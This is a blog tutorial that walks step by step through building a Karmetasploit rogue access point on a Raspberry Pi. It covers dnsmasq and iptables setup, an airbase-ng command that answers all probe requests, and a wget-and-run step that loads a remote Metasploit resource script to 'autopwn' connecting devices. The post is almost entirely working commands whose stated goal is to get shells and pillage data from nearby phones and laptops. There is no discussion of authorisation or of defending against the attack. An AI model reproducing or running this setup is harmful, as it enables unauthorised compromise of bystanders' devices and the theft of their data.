Auto-Compromising Devices with Karmetasploit

For years, I’ve found that penetrating corporate environments through mobile devices is much easier than attacking border-edge firewalls and hardened servers.  For this reason, I’ve begun using kits such as Karmetasploit.  Leveraging a Raspberry Pi and Metasploit, allows for instant shells and pillaging of data. Using nothing more than a RaspberryPi, Alfa antenna and a internet connection.

Here is how you do it…

Install Raspbian on a Pi2 or greater.  Once this has been done, apply all of the available updates.

sudo apt-get update && apt-get -y upgrade && apt-get -y install vim

Next, install dnsmasq.  This will be used for DNS resolution and DHCP address handouts.

sudo apt-get -y install dnsmasq

Once it is installed, configure dnsmasq by performing the following:

vi /etc/dnsmasq.conf

Update it to include the following at the top:

 

# If you want dnsmasq to listen for DHCP and DNS requests only on
# specified interfaces (and the loopback) give the name of the
# interface (eg eth0) here.
# Repeat the line for more than one interface.
interface=at0
#interface=wlan0mon
#interface=wlan0

# Uncomment this to enable the integrated DHCP server, you need
# to supply the range of addresses available for lease and optionally
# a lease time. If you have more than one network, you will need to
# repeat this for each network on which you want to supply DHCP
# service.
dhcp-range=10.10.10.50,10.10.10.150,12h

Next, install Aircrack-ng by doing the following:

sudo apt-get -y install aircrack-ng

Once this is in place, you will need to create the proper rules to forward all “hooked” traffic.  You can do this by issuing the following commands:

modprobe iptable_nat
iptables -A FORWARD -i wlan0mon -j ACCEPT
iptables -A FORWARD -i at0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

Okay, time to start hooking devices…

Start airbase-ng in a mode that has a default SSID, but will also associate to all beacon requests.  Issue the following command.  It will also create a new interface named at0:

airbase-ng -P -C 30 -e “linksys” -v wlan0mon

If done properly, you will see something similar:

Screen Shot 2016-03-17 at 4.46.40 PM

Open a second terminal window, issue the following to configure the interface on at0:

ifconfig at0 up 10.10.10.1 netmask 255.255.255.0

Restart dnsmasq:

service dnsmasq restart

Finally, begin autopwning devices by issuing the following command:

cd /opt && wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt && msfconsole -q -r /opt/karma.rc_.txt

If done properly, you should see the following:

Screen Shot 2016-03-17 at 4.58.32 PM

You can confirm this by connecting a test device to any previously accepted WiFi networks and opening a browser.  It should reveal the following:

image

When successful, shells will be returned into the second console window that should be running Karmetasploit.

Leave a Reply

Your email address will not be published. Required fields are marked *